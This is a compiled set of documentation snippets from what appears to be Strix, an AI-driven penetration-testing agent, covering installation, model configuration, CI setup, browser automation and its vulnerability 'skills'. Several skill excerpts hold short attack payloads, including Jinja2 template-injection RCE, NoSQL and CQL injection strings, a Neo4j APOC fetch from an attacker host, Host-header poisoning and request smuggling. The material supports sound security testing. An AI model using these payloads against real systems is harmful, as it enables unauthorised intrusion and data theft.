### Agent Browser Quickstart: Screenshot and Search Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md A quickstart guide demonstrating how to take a screenshot of a page and perform a search, click a result, and capture it. The browser remains active across commands for a seamless session. ```bash # Take a screenshot of a page agent-browser open https://example.com agent-browser screenshot agent-browser close # Search, click a result, and capture it agent-browser open https://duckduckgo.com agent-browser snapshot -i # find the search box ref agent-browser fill @e1 "agent-browser cli" agent-browser press Enter agent-browser wait --load networkidle agent-browser snapshot -i # refs now reflect results agent-browser click @e5 # click a result agent-browser screenshot ``` -------------------------------- ### Example Azure OpenAI Configuration Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/azure.mdx An example demonstrating the environment variables needed for a specific Azure OpenAI deployment. This shows a concrete instance of the setup variables. ```bash export STRIX_LLM="azure/gpt-5.4-deployment" export AZURE_API_KEY="abc123..." export AZURE_API_BASE="https://mycompany.openai.azure.com" export AZURE_API_VERSION="2025-11-01-preview" ``` -------------------------------- ### Example Environment Variable Setup Source: https://github.com/usestrix/strix/blob/main/docs/advanced/configuration.mdx Set required and optional environment variables to configure Strix, including LLM and web search. ```bash # Required export STRIX_LLM="openai/gpt-5.4" export LLM_API_KEY="sk-..." # Optional: Enable web search export PERPLEXITY_API_KEY="pplx-..." # Optional: Custom timeouts export LLM_TIMEOUT="600" export STRIX_SANDBOX_EXECUTION_TIMEOUT="300" ``` -------------------------------- ### Install and Run Local Preview Source: https://github.com/usestrix/strix/blob/main/docs/README.md Install Mintlify globally and then run the local development server from the docs directory. ```bash npm i -g mintlify cd docs && mintlify dev ``` -------------------------------- ### Basic Scan Example Source: https://github.com/usestrix/strix/blob/main/docs/usage/cli.mdx Initiates a scan on a given URL. This is the simplest way to start testing a target. ```bash strix --target https://example.com ``` -------------------------------- ### Install Development Dependencies Source: https://github.com/usestrix/strix/blob/main/docs/contributing.mdx Install all necessary development dependencies using the provided Makefile or manually with uv. ```bash make setup-dev ``` ```bash uv sync uv run pre-commit install ``` -------------------------------- ### Gospider Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md An example of using gospider as an alternate crawler to find endpoints missed by Katana, with specified start URL, depth, concurrency, and threads. ```bash gospider -s https://target.tld -d 3 -c 10 -t 20 ``` -------------------------------- ### Install Strix with Vertex AI Extra Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/vertex.mdx Install the Strix agent with the necessary Vertex AI dependencies using pipx. ```bash pipx install "strix-agent[vertex]" ``` -------------------------------- ### Install Strix using curl Source: https://github.com/usestrix/strix/blob/main/docs/quickstart.mdx Use this command to install Strix directly from the official source. ```bash curl -sSL https://strix.ai/install | bash ``` -------------------------------- ### Install, Configure, and Run Strix Scan Source: https://github.com/usestrix/strix/blob/main/docs/index.mdx This snippet shows how to install Strix using curl, configure necessary environment variables for the LLM, and initiate a scan against a local application directory. ```bash # Install curl -sSL https://strix.ai/install | bash # Configure export STRIX_LLM="openai/gpt-5.4" export LLM_API_KEY="your-api-key" # Scan strix --target ./your-app ``` -------------------------------- ### Install Strix and Run First Scan Source: https://github.com/usestrix/strix/blob/main/README.md Installs Strix using a curl script, configures an AI provider with environment variables, and initiates a security assessment on a local directory. ```bash curl -sSL https://strix.ai/install | bash export STRIX_LLM="openai/gpt-5.4" export LLM_API_KEY="your-api-key" strix --target ./app-directory ``` -------------------------------- ### Install Strix using pipx Source: https://github.com/usestrix/strix/blob/main/docs/quickstart.mdx Install the Strix agent using the pipx package manager. ```bash pipx install strix-agent ``` -------------------------------- ### GraphQL Transport Switching Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md Demonstrates various Content-Type headers used to switch transport mechanisms for GraphQL requests, including JSON, GraphQL, multipart form data, and GET requests with query parameters. ```text Content-Type: application/json Content-Type: application/graphql Content-Type: multipart/form-data GET with query params ``` -------------------------------- ### Agent Browser Snapshot Output Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md An example of the structured output format produced by the `agent-browser snapshot` command, showing elements with references, types, and text content. ```text Page: Example - Log in URL: https://example.com/login @e1 [heading] "Log in" @e2 [form] @e3 [input type="email"] placeholder="Email" @e4 [input type="password"] placeholder="Password" @e5 [button type="submit"] "Continue" @e6 [link] "Forgot password?" ``` -------------------------------- ### Scope Configuration Example Source: https://github.com/usestrix/strix/blob/main/docs/tools/proxy.mdx Example configuration for defining allowlist and denylist rules to filter proxy traffic. These rules help focus the proxy on specific domains or exclude certain file types. ```plaintext Allowlist: ["api.example.com", "*.example.com"] Denylist: ["*.gif", "*.jpg", "*.png", "*.css", "*.js"] ``` -------------------------------- ### Example Instruction File Content Source: https://github.com/usestrix/strix/blob/main/docs/usage/instructions.mdx This markdown file demonstrates how to structure detailed penetration test instructions, including credentials, focus areas, and out-of-scope items. ```markdown # Penetration Test Instructions ## Credentials - Admin: admin@example.com / AdminPass123 - User: user@example.com / UserPass123 ## Focus Areas 1. IDOR in user profile endpoints 2. Privilege escalation between roles 3. JWT token manipulation ## Out of Scope - /health endpoints - Third-party integrations ``` -------------------------------- ### Skill File Structure Example Source: https://github.com/usestrix/strix/blob/main/docs/advanced/skills.mdx This is a standard template for a skill file, including YAML frontmatter for metadata and Markdown sections for detailed information. ```markdown --- name: skill_name description: Brief description of the skill's coverage --- # Skill Title Key insight about this vulnerability or technique. ## Attack Surface What this skill covers and where to look. ## Methodology Step-by-step testing approach. ## Techniques How to discover and exploit the vulnerability. ## Bypass Methods How to bypass common protections. ## Validation How to confirm findings and avoid false positives. ``` -------------------------------- ### Jenkins Pipeline Configuration Source: https://github.com/usestrix/strix/blob/main/docs/integrations/ci-cd.mdx Set up a Jenkins pipeline to install and run Strix. Use Jenkins credentials for STRIX_LLM and LLM_API_KEY. ```groovy pipeline { agent any environment { STRIX_LLM = credentials('strix-llm') LLM_API_KEY = credentials('llm-api-key') } stages { stage('Security Scan') { steps { sh 'curl -sSL https://strix.ai/install | bash' sh 'strix -n -t ./ --scan-mode quick' } } } } ``` -------------------------------- ### Example Model Formats Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/overview.mdx Illustrates the LiteLLM model naming convention using the 'provider/model-name' format for various LLM services. ```text openai/gpt-5.4 anthropic/claude-sonnet-4-6 vertex_ai/gemini-3-pro-preview bedrock/anthropic.claude-4-5-sonnet-20251022-v1:0 ollama/llama4 ``` -------------------------------- ### Cassandra CQL Injection Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md Examples of injecting conditions into Cassandra CQL queries when input is concatenated instead of bound. ```text username: ' OR '1'='1' ALLOW FILTERING -- ``` ```text username: 'x' OR token(username) > token('a') ALLOW FILTERING -- ``` -------------------------------- ### JS-Snooper Script Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md Demonstrates the usage of the JS-Snooper script for internal JavaScript file discovery on a given domain. ```bash ~/tools/JS-Snooper/js_snooper.sh ``` -------------------------------- ### Jsniper Script Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/katana.md Shows how to use the jsniper.sh script to perform a sweep for JavaScript files, endpoints, keys, and secrets on a domain. ```bash ~/tools/jsniper.sh/jsniper.sh ``` -------------------------------- ### Record Browser Workflow Video Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md Record a video of browser interactions. Start recording with `record start `, perform actions, and stop with `record stop`. Refer to the documentation for codec options and GIF export. ```bash agent-browser record start demo.webm ``` ```bash agent-browser open https://example.com ``` ```bash agent-browser snapshot -i ``` ```bash agent-browser click @e3 ``` ```bash agent-browser record stop ``` -------------------------------- ### Fetch and Analyze POST Requests Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/python.md An example demonstrating how to fetch POST requests within a specific API path using `list_requests` and then analyze their raw bodies for specific content. Requires `asyncio` to run. ```python import asyncio from caido_api import list_requests, view_request async def main(): posts = await list_requests( httpql_filter='req.method.eq:"POST" AND req.path.cont:"/api/"', first=50, ) candidates = [] for edge in posts.edges: request_id = edge.node.request.id body = await view_request(request_id, part="request") raw = body.request.raw.decode("utf-8", errors="replace") if "id=" in raw or "user=" in raw: candidates.append(request_id) print(f"{len(candidates)} candidates") print(candidates[:10]) asyncio.run(main()) ``` -------------------------------- ### Jinja Template Probes Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/ssti.md Examples of probing for available objects within a Jinja templating environment. ```jinja {{self}} {{config}} {{request}} {{cycler}} ``` -------------------------------- ### Content-Type Switching Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/fastapi.md Demonstrates how different content types can lead to different validation logic or code paths within an application. This can be exploited by switching between JSON, form data, and multipart data. ```text application/json ↔ application/x-www-form-urlencoded ↔ multipart/form-data ``` -------------------------------- ### NoSQL Injection Example: Bracket Notation Input Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md Illustrates sending NoSQL operators using bracket notation in the form fields or URL parameters. This bypasses middleware that only parses JSON bodies. ```url field[\$ne]=null ``` -------------------------------- ### Template Injection Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/fastapi.md Demonstrates basic arithmetic confirmation and Remote Code Execution (RCE) via Jinja2 template injection in FastAPI. Check autoescape settings and custom filters/globals. ```python {{7*7}} # Arithmetic confirmation {{cycler.__init__.__globals__['os'].popen('id').read()}} # RCE ``` -------------------------------- ### GraphQL Input Type Confusion Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md Demonstrates various type confusion scenarios by providing unexpected data types for input fields, such as numbers instead of strings or arrays instead of null. ```json {id: 123} vs {id: "123"} {id: [123]} vs {id: null} {id: 0} vs {id: -1} ``` -------------------------------- ### Fetch Build Manifests and Chunks Source: https://github.com/usestrix/strix/blob/main/strix/skills/frameworks/nextjs.md Demonstrates common GET requests to retrieve Next.js build artifacts like build manifests and JavaScript chunks, which can reveal route structure. ```http GET /_next/static//_buildManifest.js GET /_next/static//_ssgManifest.js GET /_next/static/chunks/pages/ GET /_next/static/chunks/app/ ``` -------------------------------- ### H2.CL Example: HTTP/2 Front-end Downgrades to HTTP/1.1, Injects Content-Length Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/http_request_smuggling.md Shows how an HTTP/2 front-end downgrading to HTTP/1.1 can be exploited by injecting a conflicting 'content-length' header, leading to smuggling. ```http :method POST :path / :authority target.com content-type application/x-www-form-urlencoded content-length: 0 SMUGGLED_PREFIX ``` -------------------------------- ### Get Core Agent Browser Skills with Full Details Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md Use this command to retrieve all available skills for the agent-browser with full details. This includes information about commands, flags, and environment variables. ```bash agent-browser skills get core --full ``` -------------------------------- ### Host Header Confusion Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/header_injection.md Demonstrates a POST request with a forged Host header to exploit host header confusion. This can lead to password reset links or OAuth redirect URIs pointing to attacker-controlled infrastructure. ```http POST /password-reset HTTP/1.1 Host: attacker.tld ``` -------------------------------- ### Provide Instructions via File Source: https://github.com/usestrix/strix/blob/main/README.md Use a file to provide detailed instructions, scope, and exclusions for the security scan. ```bash strix --target api.your-app.com --instruction-file ./instruction.md ``` -------------------------------- ### GraphQL Endpoint Discovery Source: https://github.com/usestrix/strix/blob/main/strix/skills/protocols/graphql.md Common POST and GET requests to discover GraphQL endpoints. These examples test basic query execution to identify active GraphQL endpoints. ```bash POST /graphql {"query":"{__typename}"} POST /api/graphql {"query":"{__typename}"} POST /v1/graphql {"query":"{__typename}"} POST /gql {"query":"{__typename}"} GET /graphql?query={__typename} ``` -------------------------------- ### Agent Creation with Specialized Skills Source: https://github.com/usestrix/strix/blob/main/strix/skills/README.md Demonstrates how to create an agent and load specific skills relevant to its task. Skills are provided as a comma-separated string. ```python create_agent( task="Test authentication mechanisms in API", name="Auth Specialist", skills="authentication_jwt,business_logic" ) ``` -------------------------------- ### Run Strix with File-Based Instructions Source: https://github.com/usestrix/strix/blob/main/docs/usage/instructions.mdx For more complex instructions, use the --instruction-file flag to specify a path to a markdown file. This allows for detailed guidance. ```bash strix --target https://app.com --instruction-file ./pentest-instructions.md ``` -------------------------------- ### Elasticsearch Query String Injection Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md Examples of injecting Lucene syntax into Elasticsearch query_string and simple_query_string for various probes. ```text q=normal+search → normal results ``` ```text q=* ``` ```text q=role:admin → filter by field ``` ```text q=_exists_:password_hash → existence probe ``` -------------------------------- ### Configure Strix with LM Studio / OpenAI Compatible Source: https://github.com/usestrix/strix/blob/main/docs/llm-providers/local.mdx Set environment variables to connect Strix to a local LLM server compatible with the OpenAI API format. Adjust the port if your server runs on a different one. ```bash export STRIX_LLM="openai/local-model" export LLM_API_BASE="http://localhost:1234/v1" ``` -------------------------------- ### GraphQL Variable Injection Example Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md Example of injecting a filter condition into a GraphQL query when variables are passed directly to a NoSQL filter. ```graphql query Login($input: UserFilter!) { user(filter: $input) { id role } } ``` ```json {"input": {"username": "admin", "password": {"$ne": ""}}} ``` -------------------------------- ### Neo4j APOC Procedure Abuse Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/nosql_injection.md Examples of abusing APOC procedures for SSRF, external data fetch, and dynamic query execution when unrestricted. ```text CALL apoc.load.json('http://attacker/x') ``` ```text CALL apoc.cypher.run("", {}) ``` ```text CALL dbms.security.listUsers() ``` -------------------------------- ### Agent Browser Core Loop Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md Illustrates the fundamental workflow of opening a URL, taking a snapshot to identify interactive elements, acting on those elements using references, and re-snapshotting after changes. ```bash agent-browser open # 1. Open a page agent-browser snapshot -i # 2. See what's on it (interactive elements only) agent-browser click @e3 # 3. Act on refs from the snapshot agent-browser snapshot -i # 4. Re-snapshot after any page change ``` -------------------------------- ### Install Python Packages with uv Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/python.md Use the `uv` package manager to install additional Python dependencies for an exploit script within the sandbox environment. Specify the Python interpreter path. ```bash uv pip install --python /app/.venv/bin/python ``` -------------------------------- ### Agent Browser Snapshot Options Source: https://github.com/usestrix/strix/blob/main/strix/skills/tooling/agent_browser.md Demonstrates various options for the `snapshot` command to customize the output, including full tree, interactive elements, including URLs, compact output, depth capping, scoping by CSS selector, and JSON output. ```bash agent-browser snapshot # full tree (verbose) agent-browser snapshot -i # interactive elements only (preferred) agent-browser snapshot -i -u # include href urls on links agent-browser snapshot -i -c # compact (no empty structural nodes) agent-browser snapshot -i -d 3 # cap depth at 3 levels agent-browser snapshot -s "#main" # scope to a CSS selector agent-browser snapshot -i --json # machine-readable output ``` -------------------------------- ### Mutation XSS Examples Source: https://github.com/usestrix/strix/blob/main/strix/skills/vulnerabilities/xss.md Illustrates Mutation XSS by using malformed HTML tags and attributes that can be repaired by the browser's parser to execute arbitrary code. These examples leverage noscript tags and form attributes. ```html